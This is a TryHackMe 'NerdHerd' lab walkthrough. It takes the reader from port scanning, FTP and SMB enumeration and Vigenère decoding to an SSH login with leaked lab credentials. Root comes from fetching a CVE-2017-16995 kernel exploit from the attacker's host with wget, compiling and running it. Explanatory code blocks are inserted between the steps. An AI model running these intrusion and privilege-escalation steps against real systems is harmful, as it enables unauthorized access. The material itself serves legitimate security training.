TryHackMe - NerdHerd
| Title | NerdHerd |
|---|---|
| Difficulty | Medium |
| Authors | 0xpr0N3rd |
| Tags | ctf, challenge, ftp, smb, encryption |
Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- --min-rate 5000 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-27 22:40 EST
Warning: 10.10.86.80 giving up on port because retransmission cap hit (10).
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.30s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 35.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -A -sV -Pn -p 21,22,139,445,1337 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-27 22:42 EST
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.63.75
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 pub
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0c841b36b2a2e111dd6aef427b0dbb43 (RSA)
| 256 e25d9ee728ead3ddd4cc2086a3df23b8 (ECDSA)
|_ 256 ecbe237ba94c2185bca8db0e7c39de49 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1337/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.4 (98%), Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: NERDHERD; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -40m01s, deviation: 1h09m16s, median: -2s
|_nbstat: NetBIOS name: NERDHERD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-12-28T03:42:46
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: nerdherd
| NetBIOS computer name: NERDHERD\x00
| Domain name: \x00
| FQDN: nerdherd
|_ System time: 2023-12-28T05:42:46+02:00
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 256.25 ms 10.9.0.1
2 268.14 ms nerdherd.thm (10.10.86.80)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.74 seconds
FTP (port 21)
Anonymous login is available on the FTP service:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ ftp nerdherd.thm
Connected to nerdherd.thm.
220 (vsFTPd 3.0.3)
Name (nerdherd.thm:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41799|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 pub
226 Directory send OK.
Digging further into the pub directory reveals a .png file and another sub-directory:
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||42904|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
drwxr-xr-x 2 ftp ftp 4096 Sep 14 2020 .jokesonyou
-rw-rw-r-- 1 ftp ftp 89894 Sep 11 2020 youfoundme.png
226 Directory send OK.
ftp> get youfoundme.png
local: youfoundme.png remote: youfoundme.png
229 Entering Extended Passive Mode (|||42534|)
150 Opening BINARY mode data connection for youfoundme.png (89894 bytes).
100% |*******| 89894 45.81 KiB/s 00:00 ETA
226 Transfer complete.
89894 bytes received in 00:02 (39.24 KiB/s)
Download the image file and continue with the remaining directory:
ftp> cd .jokesonyou
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||49381|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Sep 14 2020 .
drwxr-xr-x 3 ftp ftp 4096 Sep 11 2020 ..
-rw-r--r-- 1 ftp ftp 28 Sep 14 2020 hellon3rd.txt
226 Directory send OK.
ftp> get hellon3rd.txt
local: hellon3rd.txt remote: hellon3rd.txt
229 Entering Extended Passive Mode (|||42233|)
150 Opening BINARY mode data connection for hellon3rd.txt (28 bytes).
100% |*******| 28 156.25 KiB/s 00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (0.08 KiB/s)
Get the .txt file and go back to the local machine to analyze this evidence. The .txt file contains a message that can be used as a hint in the next few steps:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ cat hellon3rd.txt
all you need is in the leet
Next, I open the image to see whether there is any text or hint in it. Then, using exiftool, I determine that the .png file is not a simple image file:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ exiftool youfoundme.png
ExifTool Version Number : 12.57
File Name : youfoundme.png
Directory : .
File Size : 90 kB
File Modification Date/Time : 2020:09:10 23:45:43-04:00
File Access Date/Time : 2023:12:27 23:44:20-05:00
File Inode Change Date/Time : 2023:12:27 23:44:20-05:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 894
Image Height : 894
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Background Color : 255 255 255
Pixels Per Unit X : 3543
Pixels Per Unit Y : 3543
Pixel Units : meters
Warning : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate : 2010-10-26T08:00:31-07:00
Datemodify : 2010-10-26T08:00:31-07:00
Software : www.inkscape.org
EXIF Orientation : 1
Exif Byte Order : Big-endian (Motorola, MM)
Resolution Unit : inches
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
Flashpix Version : 0100
Owner Name : fijbxslz
Image Size : 894x894
Megapixels : 0.799
The “Owner Name” is a weird string and I think it could be a key for an encrypted or encoded string in this lab. So I keep it and move on.
SMB (ports 139 and 445)
Currently, the anonymous (guest) session has no access to any share:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u anonymous -H nerdherd.thm
[+] Guest session IP: nerdherd.thm:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
nerdherd_classified NO ACCESS Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
I use nmap to enumerate the users on this system:
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-enum-users -p 139,445 nerdherd.thm
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-28 01:28 EST
Nmap scan report for nerdherd.thm (10.10.86.80)
Host is up (0.30s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-users:
| NERDHERD\chuck (RID: 1000)
| Full name: ChuckBartowski
| Description:
|_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds
Now I’ve got the username:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u chuck -H nerdherd.thm
[!] Authentication error on nerdherd.thm
But I do not have the password yet. I leave it here and come back later.
Port 1337
Opening port 1337 in a web browser, an alert window pops up on my screen:
These two alerts must be produced by a <script> block. Pressing Ctrl + U to view the page source, I find the alert function at the end:
<body onload="alertFunc()">
<script>
function alertFunc() {
alert("HACKED by 0xpr0N3rd");
alert("Just kidding silly.. I left something in here for you to find")
}
</script>
<p>Maybe the answer is in <a href="https://www.youtube.com/watch?v=9Gc4QTqslN4">here</a>.</p>
The message on the last line looks like a hint. But, as in the previous rooms I have done, it is just a common trick from the author:
Using curl to quickly retrieve all the comments from the HTML source code, I receive these messages:
<!--
hmm, wonder what i hide here?
-->
[--snipped--]
<!--
maybe nothing? :)
-->
[--snipped--]
<!--
keep digging, mister/ma'am
-->
So I move on in a different way.
Fuzzing (port 1337)
Using gobuster with only the common.txt wordlist, I discovered an interesting sub-path, /admin:
/.htpasswd (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/admin (Status: 301) [Size: 319] [--> http://nerdherd.thm:1337/admin/]
/index.html (Status: 200) [Size: 11755]
Before trying to log in or brute-force the credentials, I decide to check the HTML source code again and luckily find this:
<!--
these might help:
Y2liYXJ0b3dza2k= : aGVoZWdvdTwdasddHlvdQ==
-->
Decoding the first part with base64 gives me a string that could be the username:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ echo "Y2liYXJ0b3dza2k=" | base64 -d
cibartowski
But the second part does not:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ echo "aGVoZWdvdTwdasddHlvdQ==" | base64 -d
hehegou<j�][�base64: invalid input
I try entering random credentials into the login form and send the request, then I notice the request has changed to this form:
http://nerdherd.thm:1337/admin/?email=cibartowski&pass=passwd
I guess the parameters email and pass might be injectable with SQL injection, so I use sqlmap to check, but:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ sqlmap -u "http://nerdherd.thm:1337/?email=1&pass=1" --batch -dbs --level 3 --risk 3
[--snipped--]
[WARNING] GET parameter 'email' does not seem to be injectable
[WARNING] GET parameter 'pass' does not seem to be injectable
[--snipped--]
Hmmm… It seems I have missed something. I go back and do a couple of things:
- Fuzz the target URL with a bigger wordlist: nothing new
- Look again at the FTP enumeration: the note hellon3rd.txt and the exiftool information of the .png file, the “Owner Name” fijbxslz
Googling the string, I discover it is related to the Vigenère cipher. I try using it as the key to decrypt the previous string, but nothing works:
Then it must be the ciphertext, and the question becomes “What is the key?”. Let’s get back to the HTML source code of the first page on port 1337:
<p>Maybe the answer is in <a href="https://www.youtube.com/watch?v=9Gc4QTqslN4">here</a>.</p>
I carefully listen to the music from the YouTube video and realize there is a word that keeps being repeated. I search for the lyrics and here they are:
A-well-a everybody's heard about the bird
B-b-b-bird, b-birdd's the word
A-well, a bird, bird, bird, bird is the word
A-well, a bird, bird, bird, well-a bird is the word
A-well, a bird, bird, bird, b-bird's the word
A-well, a bird, bird, bird, well-a bird is the word
A-well, a bird, bird, b-bird is the word
A-well, a bird, bird, bird, b-bird's the word
[--snipped--]
bird!! Let’s try it as the key. The result is more meaningful now. Try a little bit more!
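Why a trial key that is only the first word of the real key gives a result that is "more meaningful" but still wrong, as an added example that is not code from the writeup: with Vigenère, each plaintext letter is shifted by one key letter, so a trial key that agrees with the true key for its first n letters decrypts exactly the first n letters correctly and then garbles the rest. The plaintext and ciphertext below are constructed; the two keys follow the lyric hint quoted above and are an assumption about the intended key, not values quoted from the page.

```python
# Added example, not code from the writeup: a small Vigenère implementation used
# to show how far a partial key gets you. PLAINTEXT is constructed; FULL_KEY and
# SHORT_KEY are an assumption based on the lyric hint in the writeup.
import string

ALPHABET = string.ascii_lowercase


def vigenere(text, key, decrypt=False):
    """Shift the letters a-z of `text` by the repeating key. Characters outside
    a-z pass through unchanged and do not advance the key position."""
    shifts = [ALPHABET.index(k) for k in key.lower() if k in ALPHABET]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, ki = [], 0
    for ch in text.lower():
        if ch in ALPHABET:
            shift = shifts[ki % len(shifts)]
            if decrypt:
                shift = -shift
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def encrypt(plaintext, key):
    return vigenere(plaintext, key)


def decrypt(ciphertext, key):
    return vigenere(ciphertext, key, decrypt=True)


def correct_prefix(candidate, truth):
    """How many leading characters a trial decryption gets right."""
    n = 0
    for a, b in zip(candidate, truth):
        if a != b:
            break
        n += 1
    return n


# Constructed demonstration values.
PLAINTEXT = "accessgranted"
FULL_KEY = "birdistheword"  # assumed full key phrase from the lyric hint
SHORT_KEY = "bird"          # the first word only, as the writeup first tries
CIPHERTEXT = encrypt(PLAINTEXT, FULL_KEY)  # "bkthakzyejhvg"

if __name__ == "__main__":
    partial = decrypt(CIPHERTEXT, SHORT_KEY)
    print("ciphertext :", CIPHERTEXT)
    print("key 'bird' :", partial,
          f"(first {correct_prefix(partial, PLAINTEXT)} letters right)")
    print("full key   :", decrypt(CIPHERTEXT, FULL_KEY))
```

With the short key, only the first four letters of the output read correctly; the key repeats from position five onward while the true key does not, so the rest is noise. That is the "try a little bit more" signal: a readable prefix whose length equals the length of the trial key means the key is right so far and simply too short.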
Boom! I got this! Now, how can I use it? Remembering the authentication error from the SMB service, I try it as the password:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbmap -u chuck -p [REDACTED] -H nerdherd.thm
[+] IP: nerdherd.thm:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
nerdherd_classified READ ONLY Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
Aha!! There it is! Now I use smbclient to connect to the share and download the helpful information on it:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ smbclient \\\\nerdherd.thm\\nerdherd_classified -U chuck%[REDACTED]
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> ls
. D 0 Thu Sep 10 21:29:53 2020
.. D 0 Thu Nov 5 15:44:40 2020
secr3t.txt N 125 Thu Sep 10 21:29:53 2020
8124856 blocks of size 1024. 3325768 blocks available
smb: \> get secr3t.txt
getting file \secr3t.txt of size 125 as secr3t.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
And the content of secr3t.txt:
Ssssh! don't tell this anyone because you deserved it this far:
check out "/this1sn0tadirect0ry"
Sincerely,
0xpr0N3rd
<3
Accessing the hidden directory, I get a creds.txt file:
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ wget http://nerdherd.thm:1337/this1sn0tadirect0ry/creds.txt
--2023-12-28 01:44:47-- http://nerdherd.thm:1337/this1sn0tadirect0ry/creds.txt
Resolving nerdherd.thm (nerdherd.thm)... 10.10.86.80
Connecting to nerdherd.thm (nerdherd.thm)|10.10.86.80|:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84 [text/plain]
Saving to: ‘creds.txt’
creds.txt 100%[==============================================>] 84 --.-KB/s in 0s
2023-12-28 01:44:47 (11.5 MB/s) - ‘creds.txt’ saved [84/84]
┌──(kali㉿kali)-[~/TryHackMe/nerdherd]
└─$ cat creds.txt
alright, enough with the games.
here, take my ssh creds:
chuck : th1s41ntmypa5s
Gain Access
After logging in over SSH with the above credentials, I easily get the user flag:
chuck@nerdherd:~$ ls -l
total 52
drwxr-xr-x 2 chuck chuck 4096 Kas 5 2020 Desktop
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Documents
drwxr-xr-x 3 chuck chuck 4096 Eyl 11 2020 Downloads
-rw-r--r-- 1 chuck chuck 8980 Eyl 11 2020 examples.desktop
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Music
drwxr-xr-x 2 root root 4096 Eyl 11 2020 nerdherd_classified
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Pictures
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Public
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Templates
-rw-rw-r-- 1 chuck chuck 46 Eyl 14 2020 user.txt
drwxr-xr-x 2 chuck chuck 4096 Eyl 11 2020 Videos
chuck@nerdherd:~$ cat user.txt
THM{REDACTED}
Vertical Privilege Escalation
Even though the current user chuck is in the sudo group (27(sudo)), I still cannot use the sudo command:
chuck@nerdherd:~$ id
uid=1000(chuck) gid=1000(chuck) groups=1000(chuck),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
chuck@nerdherd:~$ sudo -l
[sudo] password for chuck:
Sorry, user chuck may not run sudo on nerdherd.
From the error message, it seems the current user is restricted on this host. The two common privesc checks I usually run are:
- Finding SUID files/services: took too long to respond
- Finding capabilities: returned nothing helpful
chuck@nerdherd:~$ hostnamectl
Static hostname: nerdherd
Icon name: computer-vm
Chassis: vm
Machine ID: f91fe3b517c94d8b987dedf05d38cfbc
Boot ID: 9fb95f5287694a7eb2fbe506e25d47fa
Virtualization: xen
Operating System: Ubuntu 16.04.1 LTS
Kernel: Linux 4.4.0-31-generic
Architecture: x86-64
Look at the kernel version! It is out of date: 4.4.0. There is a CVE-2017-16995 exploit for this version that is able to **Locally Escalate Privilege**. I create the exploit file on my local machine and then transfer it to the target system:
chuck@nerdherd:~$ ls -l pwn.c
-rw-rw-r-- 1 chuck chuck 28376 Ara 28 09:13 pwn.c
chuck@nerdherd:~$ wget http://10.9.63.75:8000/pwn.c
--2023-12-28 09:23:23-- http://10.9.63.75:8000/pwn.c
Connecting to 10.9.63.75:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13248 (13K) [text/x-csrc]
Saving to: ‘pwn.c’
pwn.c 100%[==============================================>] 12,94K 40,9KB/s in 0,3s
2023-12-28 09:23:24 (40,9 KB/s) - ‘pwn.c’ saved [13248/13248]
chuck@nerdherd:~$ gcc pwn.c -o pwn
chuck@nerdherd:~$ ls -l pwn
-rwxrwxr-x 1 chuck chuck 18432 Ara 28 09:23 pwn
chuck@nerdherd:~$ ./pwn
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880007fa4300
[*] Leaking sock struct from ffff880005ef1e00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880007facc00
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880007facc00
[*] credentials patched, launching shell...
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(chuck)
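A read-only check for the exposure exploited above, as an added example that is not code from the writeup. CVE-2017-16995 (the CVE number is the one cited above) is an eBPF verifier bug reached through the unprivileged bpf() syscall, so two things decide whether an unprivileged local user can use it: whether the running kernel predates the release carrying the fix, and whether the `kernel.unprivileged_bpf_disabled` sysctl already refuses bpf() to unprivileged users, which closes this path even on an unpatched kernel. The fixed release is an input the caller takes from the distribution advisory; the `4.4.0-999-generic` value used in `main` is a placeholder, not a real version.

```python
# Added example, not code from the writeup: assess a host for the unprivileged
# eBPF exposure behind CVE-2017-16995 (CVE number taken from the writeup).
# Assumption: the caller supplies the first fixed kernel release from the distro
# advisory; "4.4.0-999-generic" below is a placeholder, not a real version.
import platform
import re
from pathlib import Path

_RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_release(release):
    """'4.4.0-31-generic' -> (4, 4, 0, 31). A missing ABI number counts as 0."""
    m = _RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(part) if part is not None else 0 for part in m.groups())


def is_older_than(running, fixed):
    """Tuple comparison, so 4.4.0-31 < 4.4.0-100 and 4.4.x < 4.15.x."""
    return parse_release(running) < parse_release(fixed)


def read_unprivileged_bpf_disabled():
    """Current value of kernel.unprivileged_bpf_disabled, or None if unavailable."""
    try:
        return int(Path("/proc/sys/kernel/unprivileged_bpf_disabled").read_text().strip())
    except (OSError, ValueError):
        return None


def assess(running, fixed, unprivileged_bpf_disabled):
    """Combine both signals. Sysctl values 1 and 2 both mean unprivileged
    bpf() is refused; 0 or an unknown value is treated as not blocked."""
    older = is_older_than(running, fixed)
    blocked = unprivileged_bpf_disabled in (1, 2)
    return {
        "kernel_older_than_fix": older,
        "unprivileged_bpf_blocked": blocked,
        "exposed": older and not blocked,
    }


if __name__ == "__main__":
    running = platform.release()
    try:
        result = assess(running, "4.4.0-999-generic", read_unprivileged_bpf_disabled())
        print(f"kernel {running}:", result)
    except ValueError as err:
        print(err)
```

On the host in this writeup (4.4.0-31, sudo unusable, SUID and capability checks empty) the kernel age is the finding that matters; setting `kernel.unprivileged_bpf_disabled=1` is the mitigation to apply where the kernel cannot be updated promptly, and the check above reports `exposed: False` once either condition holds.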
As usual, I navigate to the /root directory and find the root.txt file. However, it is not the real flag:
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 62 Eyl 14 2020 root.txt
# cat root.txt
cmon, wouldnt it be too easy if i place the root flag here?
Then I list the hidden files in the current directory, check the bash history and find the bonus flag:
[--snipped--]
cp youfoundme.png /home/chuck/Desktop/
ls -la
rm youfoundme.png
THM{REDACTED}
mv /home/chuck/Downloads/youfoundme.png .
rm youfoundme.png
[--snipped--]
And another interesting thing:
[--snipped--]
pwd
rm .bash_history
wget http://22.0.97.17/.bash_history
ls -la
cat .bash_history
[--snipped--]
However, the mentioned IP address cannot be reached. Therefore, I use the find command to search for the flag with the pattern “THM{”:
find / -type f -exec grep -H "THM{" {} + 2>/dev/null
Unfortunately, the response took too long. So I decide to narrow the command by specifying a date, taken from the previous flags:
-rw-rw-r-- 1 chuck chuck 46 Eyl 14 2020 user.txt
-rw-r--r-- 1 root root 62 Eyl 14 2020 root.txt
“Eyl” is the abbreviation of September in Turkish (Googling), so the date to specify is 2020-09-14. The command line would be:
find / -type f -newermt "2020-09-14" -exec grep -H "THM{" {} + 2>/dev/null
Sadly, it did not work and kept me waiting for an hour. Then I change my mind and search by file name instead:
find / -type f -name "*root*"
and I figure out this one:
[--snipped--]
/etc/init.d/checkroot-bootclean.sh
/etc/init.d/checkroot.sh
/sbin/pivot_root
/sbin/switch_root
/root/root.txt
{REDACTED}
/lib/x86_64-linux-gnu/security/pam_rootok.so
/lib/systemd/system/initrd-switch-root.target
[--snipped--]
And I get the root flag:
# cat /opt/.root.txt
nOOt nOOt! you've found the real flag, congratz!
THM{REDACTED}
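The modification-time plus content search used above, as an added example that is not code from the writeup: it is the Python equivalent of `find / -type f -newermt "2020-09-14" -exec grep -H "THM{" {} +`, with the cut-off, the regular-file check, a size cap and the error handling that `2>/dev/null` hid written out explicitly. Scanning from `/` is what made the run above take an hour; the function takes a root directory so it can be pointed at the few places worth scanning. The sample tree is constructed.

```python
# Added example, not code from the writeup: a scoped equivalent of
#   find ROOT -type f -newermt "2020-09-14" -exec grep -H "THM{" {} + 2>/dev/null
# The tree built by build_sample_tree() is constructed for the demonstration.
import os
import re
import stat
import tempfile
from datetime import datetime

FLAG_RE = re.compile(rb"THM\{")


def find_recent_matches(root, newer_than, pattern=FLAG_RE, max_bytes=1 << 20):
    """Paths (relative to root) of regular files modified at or after
    `newer_than` (YYYY-MM-DD, local time, as find -newermt reads it) whose
    content matches `pattern`. Symlinks, special files, oversized files and
    anything unreadable are skipped, which is what 2>/dev/null hid."""
    cutoff = datetime.fromisoformat(newer_than).timestamp()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                if st.st_mtime < cutoff or st.st_size > max_bytes:
                    continue
                with open(path, "rb") as fh:
                    if pattern.search(fh.read()):
                        hits.append(os.path.relpath(path, root))
            except OSError:
                continue
    return sorted(hits)


def build_sample_tree():
    """Constructed tree: an old file carrying a flag, a newer file without one,
    and a hidden file dated the day of interest that carries a flag."""
    root = tempfile.mkdtemp(prefix="thm-demo-")
    samples = {
        "old_note.txt": ("THM{CONSTRUCTED_OLD}", "2020-09-01 10:00:00"),
        "var/log/new.log": ("nothing to see here", "2020-09-20 08:00:00"),
        "opt/.hidden.txt": ("THM{CONSTRUCTED_NEW}", "2020-09-14 21:00:00"),
    }
    for rel, (content, stamp) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        ts = datetime.fromisoformat(stamp).timestamp()
        os.utime(path, (ts, ts))  # set atime and mtime to the constructed date
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for hit in find_recent_matches(root, "2020-09-14"):
        print(hit)
```

Note that `-newermt "2020-09-14"` means "modified after midnight on that day", so a file written at 21:00 on 2020-09-14 matches while one written on 2020-09-01 does not; the date filter only trims candidates, the content match still decides.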